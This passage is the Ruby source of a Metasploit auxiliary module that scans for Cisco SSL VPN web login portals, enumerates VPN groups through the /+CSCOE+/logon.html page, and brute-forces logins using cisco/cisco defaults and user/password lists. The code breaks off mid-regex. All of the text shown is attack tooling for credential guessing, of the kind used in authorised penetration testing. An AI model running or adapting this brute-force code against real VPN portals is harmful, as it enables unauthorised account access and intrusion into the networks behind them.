## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/proto/http' require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, 'Name' => 'Cisco SSL VPN Bruteforce Login Utility', 'Description' => %{ This module scans for Cisco SSL VPN web login portals and performs login brute force to identify valid credentials. }, 'Author' => [ 'Jonathan Claudius ' ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'SSL' => true, 'USERNAME' => 'cisco', 'PASSWORD' => 'cisco' } )) register_options( [ Opt::RPORT(443), OptString.new('GROUP', [false, "A specific VPN group to use", '']) ], self.class) end def run_host(ip) unless check_conn? vprint_error("#{peer} - Connection failed, Aborting...") return false end unless is_app_ssl_vpn? vprint_error("#{peer} - Application does not appear to be Cisco SSL VPN. Module will not continue.") return false end vprint_good("#{peer} - Application appears to be Cisco SSL VPN. Module will continue.") groups = Set.new if datastore['GROUP'].empty? vprint_status("#{peer} - Attempt to Enumerate VPN Groups...") groups = enumerate_vpn_groups if groups.empty? vprint_warning("#{peer} - Unable to enumerate groups") vprint_warning("#{peer} - Using the default group: DefaultWEBVPNGroup") groups << "DefaultWEBVPNGroup" else vprint_good("#{peer} - Enumerated VPN Groups: #{groups.to_a.join(", ")}") end else groups << datastore['GROUP'] end groups << "" vprint_status("#{peer} - Starting login brute force...") groups.each do |group| each_user_pass do |user, pass| do_login(user, pass, group) end end end # Verify whether the connection is working or not def check_conn? begin res = send_request_cgi('uri' => '/', 'method' => 'GET') vprint_good("#{peer} - Server is responsive...") rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE return end end def enumerate_vpn_groups res = send_request_cgi( 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', ) if res && res.code == 302 res = send_request_cgi( 'uri' => '/+CSCOE+/logon.html', 'method' => 'GET', 'vars_get' => { 'fcadbadd' => "1" } ) end groups = Set.new group_name_regex = /